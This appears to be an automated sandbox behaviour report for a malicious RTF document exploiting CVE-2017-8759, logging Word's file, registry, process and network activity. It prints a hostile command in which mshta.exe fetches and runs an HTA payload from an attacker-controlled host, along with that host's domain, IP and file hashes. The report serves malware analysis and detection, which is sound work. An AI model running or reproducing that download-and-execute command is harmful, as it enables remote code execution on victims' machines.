RTF Doc. Uses CVE-2017-8759 Exploit to Execute Code | Grouped Behavior
Try VMRay Analyzer
| Information | Value |
|---|---|
| ID | #1 |
| File Name | c:\program files\microsoft office\root\office16\winword.exe |
| Command Line | "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:00:31, Reason: Analysis Target |
| Unmonitor | End Time: 00:02:36, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:05 |
| Information | Value |
|---|---|
| PID | 0x9b0 |
| Parent PID | 0x52c (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
A68
0x
A64
0x
A54
0x
A30
0x
A2C
0x
A28
0x
A24
0x
A20
0x
9F4
0x
9DC
0x
9D0
0x
9CC
0x
9C4
0x
9BC
0x
9B4
0x
B04
0x
B08
0x
B0C
0x
B18
0x
B24
0x
B28
0x
B2C
0x
B54
0x
B58
0x
B5C
0x
0
0x
B60
0x
B64
0x
B68
0x
BD0
0x
BD4
0x
95C
|
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\aetadzjz\desktop\logo.cs | 1.07 KB (1098 bytes) |
MD5:
667a8968a36880dc4147d2ce00c64b30
SHA1: 48233228f9babdd3bcac5b85d5ae258f91204f7e SHA256: 8aea15951d21f30f44a8d7499472b62473203959659eeb2b9059b64698deacfd |
|
|
| c:\users\aetadzjz\appdata\local\temp\91rxrejg.tmp | 0.00 KB (0 bytes) |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\users\aetadzjz\appdata\local\temp\91rxrejg.err | 0.00 KB (0 bytes) |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\users\aetadzjz\appdata\local\temp\91rxrejg.0.cs | 1.08 KB (1101 bytes) |
MD5:
3992ea6c0751d769815a98c4cffcadce
SHA1: 6ba244d7eb6a6facd2b4c4e946e26987d2336e8b SHA256: b12a34c289c97db64f4267e5c67b70f4fefedfe28ae6527e7721a6ef3e4e0adc |
|
|
| c:\users\aetadzjz\appdata\local\temp\91rxrejg.cmdline | 0.28 KB (288 bytes) |
MD5:
8d42a6a6ddda3cb8546ef4cb888dbfa8
SHA1: 2024365b4311bc93867119ceee7c876683fef607 SHA256: f0d80af454b0e9060f13236c0827a4df63d61ac4964a174c999f4aa2895ff00e |
|
|
| c:\users\aetadzjz\appdata\local\temp\91rxrejg.out | 0.37 KB (379 bytes) |
MD5:
51bfb6f473aa25324ee1ed9830ca806e
SHA1: f1fae130030df5b4dff15ed820ca35665886ea98 SHA256: 60a57285c3ccbfa3f03f050681e54c27de4ef1766fe6151104a919b7f7c8fa2e |
|
|
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\aETAdzjz\Desktop\Logo.cs | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\aETAdzjz\Desktop\Logo.cs | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.tmp | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.0.cs | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.cmdline | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.out | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.err | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C:\Windows\system32\com\SOAPAssembly | - |
|
3 | |
| Get Info | C:\Windows\system32\com\SOAPAssembly\ | type = file_attributes |
|
3 | |
| Get Info | C:\Windows\system32\com\SOAPAssembly | type = file_attributes |
|
3 | |
| Get Info | C:\Windows\system32\com | type = file_attributes |
|
3 | |
| Get Info | C:\Windows\system32 | type = file_attributes |
|
3 | |
| Get Info | C:\Windows | type = file_attributes |
|
3 | |
| Get Info | C:\Users\aETAdzjz\Desktop\http100www4samyrai777m4p-host4in0t0tp4php2thread90.dll | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config | type = file_type |
|
2 | |
| Get Info | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config | type = size, size_out = 0 |
|
1 | |
| Get Info | C:\Program Files\Microsoft Office\root\Office16\WINWORD.config | type = file_attributes |
|
2 | |
| Get Info | C:\Users\aETAdzjz\Desktop\Logo.cs | type = file_type |
|
4 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.tmp | type = file_type |
|
2 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.0.cs | type = file_type |
|
2 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.cmdline | type = file_type |
|
2 | |
| Get Info | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.out | type = file_type |
|
2 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.err | type = file_type |
|
2 | |
| Get Info | C:\Users\aETAdzjz\Desktop\http100www4samyrai777m4p-host4in0t0tp4php2thread90.dll | type = file_attributes |
|
2 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Read | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config | size = 4096, size_out = 4096 |
|
6 | |
| Read | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config | size = 4096, size_out = 1459 |
|
1 | |
| Read | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Users\aETAdzjz\Desktop\Logo.cs | size = 4096, size_out = 1098 |
|
1 | |
| Read | C:\Users\aETAdzjz\Desktop\Logo.cs | size = 950, size_out = 0 |
|
1 | |
| Read | C:\Users\aETAdzjz\Desktop\Logo.cs | size = 4096, size_out = 0 |
|
1 | |
| Write | C:\Users\aETAdzjz\Desktop\Logo.cs | size = 1098 |
|
1 | |
| Write | C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.0.cs | size = 1101 |
|
1 | |
| Write | C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.cmdline | size = 288 |
|
1 | |
| Write | C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.out | size = 379 |
|
1 | |
| Delete | C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.pdb | - |
|
1 | |
| Delete | C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.out | - |
|
1 | |
| Delete | C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.tmp | - |
|
1 | |
| Delete | C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.0.cs | - |
|
1 | |
| Delete | C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.cmdline | - |
|
1 | |
| Delete | C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.err | - |
|
1 | |
| Delete | C:\Users\aETAdzjz\Desktop\__Sn.cs | - |
|
1 |
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\COM+ SOAP Services | - |
|
3 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\COM+ SOAP Services | - |
|
3 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\COM+ SOAP Services | - |
|
3 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\COM+ SOAP Services | - |
|
3 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\COM+ SOAP Services | - |
|
3 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\COM+ SOAP Services | - |
|
3 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security | - |
|
3 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\COM+ SOAP Services | - |
|
3 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\COM+ SOAP Services | - |
|
3 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion | value_name = InstallationType, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion | value_name = InstallationType, data = Client, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = Library, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = Library, data = netfxperf.dll, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = IsMultiInstance, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = First Counter, data = 4986, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = CategoryOptions, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = CategoryOptions, data = 3, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = FileMappingSize, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = FileMappingSize, data = 131072, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = Counter Names, type = REG_BINARY |
|
2 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 |
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.cmdline" | os_pid = 0xba0, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE |
|
1 | |
| Create | C:\Windows\System32\mshta.exe | show_window = SW_SHOWNORMAL |
|
3 |
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Filename | - | process_name = c:\program files\microsoft office\root\office16\winword.exe, file_name_orig = C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE, size = 260 |
|
2 | |
| Create Mapping | - | filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 131072 |
|
1 | |
| Map | - | process_name = c:\program files\microsoft office\root\office16\winword.exe, desired_access = FILE_MAP_WRITE |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = YKYD69Q |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
3 | |
| Get Info | type = Operating System |
|
7 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = Global\.net clr networking |
|
10 | |
| Create | mutex_name = Global\.net clr networking |
|
1 | |
| Open | mutex_name = Global\.net clr networking, desired_access = MUTEX_MODIFY_STATE, SYNCHRONIZE |
|
1 | |
| Release | mutex_name = Global\.net clr networking |
|
1 | |
| Release | mutex_name = Global\.net clr networking |
|
10 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Resolve Name | host = www.samyrai777m.p-host.in, address_out = 185.211.244.133 |
|
1 |
| Information | Value |
|---|---|
| Total Data Sent | 0.09 KB (92 bytes) |
| Total Data Received | 1.21 KB (1240 bytes) |
| Contacted Host Count | 1 |
| Contacted Hosts | 185.211.244.133:80 |
| Information | Value |
|---|---|
| Handle | 0xb94 |
| Address Family | AF_INET |
| Type | SOCK_STREAM |
| Protocol | IPPROTO_TCP |
| Remote Address | 185.211.244.133 |
| Remote Port | 80 |
| Local Address | 0.0.0.0 |
| Local Port | 1984 |
| Data Sent | 0.09 KB (92 bytes) |
| Data Received | 1.21 KB (1240 bytes) |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Connect | remote_address = 185.211.244.133, remote_port = 80 |
|
1 | |
| Send | flags = NO_FLAG_SET, size = 92, size_out = 92 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 4096, size_out = 1240 |
|
1 |
| Information | Value |
|---|---|
| Total Data Sent | 0.09 KB (92 bytes) |
| Total Data Received | 1.21 KB (1240 bytes) |
| Contacted Host Count | 1 |
| Contacted Hosts | www.samyrai777m.p-host.in |
| Information | Value |
|---|---|
| Server Name | www.samyrai777m.p-host.in |
| Server Port | 80 |
| Data Sent | 0.09 KB (92 bytes) |
| Data Received | 1.21 KB (1240 bytes) |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Open Connection | protocol = http, server_name = www.samyrai777m.p-host.in, server_port = 80 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP/1.1, target_resource = /t/tp.php?thread=0 |
|
1 | |
| Send HTTP Request | headers = host: www.samyrai777m.p-host.in, connection: Keep-Alive, url = www.samyrai777m.p-host.in/t/tp.php?thread=0 |
|
1 | |
| Read Response | size = 4096, size_out = 1240 |
|
1 |
| Information | Value |
|---|---|
| ID | #2 |
| File Name | c:\windows\microsoft.net\framework64\v2.0.50727\csc.exe |
| Command Line | "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.cmdline" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:01:00, Reason: Child Process |
| Unmonitor | End Time: 00:02:36, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:36 |
| Information | Value |
|---|---|
| PID | 0xba0 |
| Parent PID | 0x9b0 (c:\program files\microsoft office\root\office16\winword.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
BA4
0x
0
|
| Operation | Class | Interface | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Create | E5CB7A31-7512-11D2-89CE-0080C792E5D8 | 31BCFCE2-DAFB-11D2-9F81-00C04F79A0A3 | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 | |
| Create | B81FF171-20F3-11D2-8DCC-00A0C9B00525 | B81FF171-20F3-11D2-8DCC-00A0C9B00521 | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 |
| Information | Value |
|---|---|
| ID | #3 |
| File Name | c:\windows\microsoft.net\framework64\v2.0.50727\cvtres.exe |
| Command Line | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\aETAdzjz\AppData\Local\Temp\RESEDB9.tmp" "c:\Users\aETAdzjz\Desktop\CSCED98.tmp" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:01:02, Reason: Child Process |
| Unmonitor | End Time: 00:02:36, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:34 |
| Remarks | No high level activity detected in monitored regions |
| Information | Value |
|---|---|
| PID | 0xbb8 |
| Parent PID | 0xba0 (c:\windows\microsoft.net\framework64\v2.0.50727\csc.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
BBC
|
| Information | Value |
|---|---|
| ID | #4 |
| File Name | c:\windows\system32\mshta.exe |
| Command Line | "C:\Windows\System32\mshta.exe" http://www.samyrai777m.p-host.in/t/t.php?thread=0 |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:01:02, Reason: Child Process |
| Unmonitor | End Time: 00:02:36, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:34 |
| Information | Value |
|---|---|
| PID | 0xbc0 |
| Parent PID | 0x9b0 (c:\program files\microsoft office\root\office16\winword.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
BC4
0x
BD8
0x
BE0
0x
BE4
0x
BE8
0x
BFC
0x
784
0x
82C
0x
84C
0x
878
0x
308
0x
6B4
|
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\x9ohk109\t[2].hta | 3.24 KB (3313 bytes) |
MD5:
13b131d98fea2526196b20496ec68b0a
SHA1: 1284d7400f30f5a2c409f3f53fcf34b30c32268d SHA256: ae09b5dc38c85387a861cb4aee8b08ef6c7b216f21ba1bd06c9d1b3adab46a75 |
|
|
| Operation | Class | Interface | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Create | 3050F5C8-98B5-11CF-BB82-00AA00BDCE0B | 00000000-0000-0000-C000-000000000046 | cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| Create | 50D5107A-D278-4871-8989-F4CEAAF59CFC | 08C0E040-62D1-11D1-9326-0060B067B86E | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_NO_CODE_DOWNLOAD |
|
1 | |
| Create | B54F3741-5B07-11CF-A4B0-00AA004A55E8 | BB1A2AE1-A4F9-11CF-8F20-00805F2CD064 | cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| Create | 6C736DB1-BD94-11D0-8A23-00AA00B58E10 | 6C736DC1-AB0D-11D0-A2AD-00A0C90F27E8 | cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| Create | WsCriPt.SHeLl | IClassFactory | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 |
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Open Mapping | #MSHTML#PERF#00000BC0 | desired_access = FILE_MAP_WRITE |
|
1 |
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CLASSES_ROOT\clsid\{25336920-03f9-11cf-8fd0-00aa00686f13}\InProcServer32 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
